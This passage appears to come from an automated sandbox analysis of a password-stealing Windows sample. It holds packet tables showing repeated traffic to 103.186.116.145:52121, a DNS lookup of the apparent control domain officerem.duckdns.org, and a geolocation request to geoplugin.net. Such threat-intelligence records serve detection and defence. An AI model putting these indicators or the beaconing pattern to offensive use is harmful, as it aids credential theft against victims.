                      Sep 25, 2024 19:49:31.935180902 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:31.940144062 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.259363890 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.311523914 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:32.433310032 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:32.434663057 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:32.439011097 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439029932 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439043045 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439055920 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439460993 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439476013 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439490080 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439505100 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439517975 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439531088 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439543962 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439557076 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439569950 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439582109 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439728975 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439758062 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.439873934 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:32.955535889 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:32.960588932 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.278727055 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.320485115 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:33.413394928 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:33.415961027 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:33.423638105 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.423655033 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.423666954 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.423767090 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.423779964 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.423914909 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.424078941 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.424227953 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.424242020 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.424360991 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.424374104 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.424386024 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.424398899 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.424411058 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.425487995 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.425625086 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.425640106 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.425777912 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:33.966444969 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:33.973077059 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.292799950 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.339462042 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:34.340697050 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:34.344640970 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.344722033 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.344749928 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.344778061 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.344827890 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.344856024 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.344906092 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.344934940 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.344981909 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345009089 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345036030 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345065117 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345113039 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345144987 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345622063 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345649004 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345680952 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345763922 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.345799923 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:34.982100010 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:34.988389969 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.307178974 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.365708113 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:35.367613077 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:35.371490002 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.371525049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.371547937 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.371598005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.371870041 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.371891022 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.371903896 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373717070 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373821020 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373835087 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373862982 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373876095 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373950005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373963118 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373975992 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.373991013 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.374028921 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.374044895 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.374102116 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:35.950731039 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:35.955737114 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.275224924 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.403645992 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:36.439690113 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:36.441093922 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:36.445235014 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445319891 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445353031 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445383072 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445415974 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445470095 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445497990 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445528984 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445555925 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445583105 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445609093 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445636988 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445712090 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.445739031 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.446062088 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.446151018 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.446177959 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.446293116 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:36.446321011 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.058629990 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:37.064357042 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.382791996 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.421574116 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:37.422913074 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:37.426664114 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426677942 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426700115 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426707983 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426716089 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426724911 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426780939 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426789999 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426800966 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426809072 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426836014 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.426843882 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.427114010 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.427123070 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.427855968 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.427867889 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.427879095 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.427889109 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.427984953 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:37.967225075 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:37.972105026 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.338604927 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.396877050 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:38.398695946 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:38.401928902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.401999950 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402060032 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402089119 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402142048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402170897 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402223110 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402251005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402277946 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402326107 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402354002 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402381897 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402409077 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402436018 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403794050 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403824091 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403875113 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403903008 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403930902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.841459990 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:38.846472979 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.186167002 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.238652945 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:39.240005016 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:39.244702101 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.244715929 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245832920 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245843887 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245853901 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245862961 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245872021 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245881081 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245889902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246016026 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246025085 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246033907 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246042013 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246052027 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.247097969 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.247118950 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.247132063 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.247143984 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.700747967 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:39.706912041 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.024368048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.073152065 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.074497938 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.078753948 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078767061 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078774929 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078845024 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078918934 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078927040 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078994989 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079536915 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079545975 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079592943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079602003 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079619884 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079627991 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079638958 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.080143929 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.080152035 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.080440044 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.080816031 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.530148983 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.535119057 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.881659985 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.931618929 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.932898045 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.936850071 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936866999 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936887026 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936897039 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936907053 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936914921 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936925888 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936929941 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936948061 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936955929 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936964035 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936973095 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936990023 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936997890 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.937746048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.937755108 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.937855005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.937916994 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.360384941 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:41.365330935 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.694633961 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.727957010 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:41.729260921 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:41.732995987 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733026981 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733057976 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733066082 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733103037 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733112097 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733158112 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733165979 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733242989 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733252048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733299017 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733308077 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733350992 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733359098 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.734143972 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.734153986 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.734183073 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.734221935 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.734304905 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.138619900 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:42.143368006 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.462111950 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.591204882 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:42.794687986 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:42.796551943 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:42.799643993 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.799720049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.799751997 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.799771070 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.799866915 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.799876928 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.799927950 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.799937010 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.800012112 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.800020933 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.800082922 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.800092936 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.800139904 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.800158978 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.801342010 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.801413059 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.801490068 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.801569939 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:42.801609039 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.450753927 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:43.457161903 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.775131941 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.825532913 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:43.845808983 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:43.847662926 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:43.851090908 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851104975 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851114035 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851121902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851130009 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851138115 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851145983 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851155043 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851162910 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851171017 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851178885 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851196051 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851203918 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.851211071 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.852499962 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.852529049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.852592945 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.852663994 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:43.852705956 CEST5212149720103.186.116.145192.168.2.9

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 25, 2024 19:45:40.651748896 CEST5409853192.168.2.91.1.1.1
                      Sep 25, 2024 19:45:41.321743011 CEST53540981.1.1.1192.168.2.9
                      Sep 25, 2024 19:45:45.817456961 CEST5171253192.168.2.91.1.1.1
                      Sep 25, 2024 19:45:45.825076103 CEST53517121.1.1.1192.168.2.9

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 25, 2024 19:45:40.651748896 CEST192.168.2.91.1.1.10x3bcaStandard query (0)officerem.duckdns.orgA (IP address)IN (0x0001)false
                      Sep 25, 2024 19:45:45.817456961 CEST192.168.2.91.1.1.10x2f1dStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 25, 2024 19:45:41.321743011 CEST1.1.1.1192.168.2.90x3bcaNo error (0)officerem.duckdns.org103.186.116.145A (IP address)IN (0x0001)false
                      Sep 25, 2024 19:45:45.825076103 CEST1.1.1.1192.168.2.90x2f1dNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • geoplugin.net

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.949712178.237.33.50805292C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      TimestampBytes transferredDirectionData
                      Sep 25, 2024 19:45:45.837045908 CEST71OUTGET /json.gp HTTP/1.1
                      Host: geoplugin.net
                      Cache-Control: no-cache
                      Sep 25, 2024 19:45:46.455668926 CEST1170INHTTP/1.1 200 OK
                      date: Wed, 25 Sep 2024 17:45:46 GMT
                      server: Apache
                      content-length: 962
                      content-type: application/json; charset=utf-8
                      cache-control: public, max-age=300
                      access-control-allow-origin: *
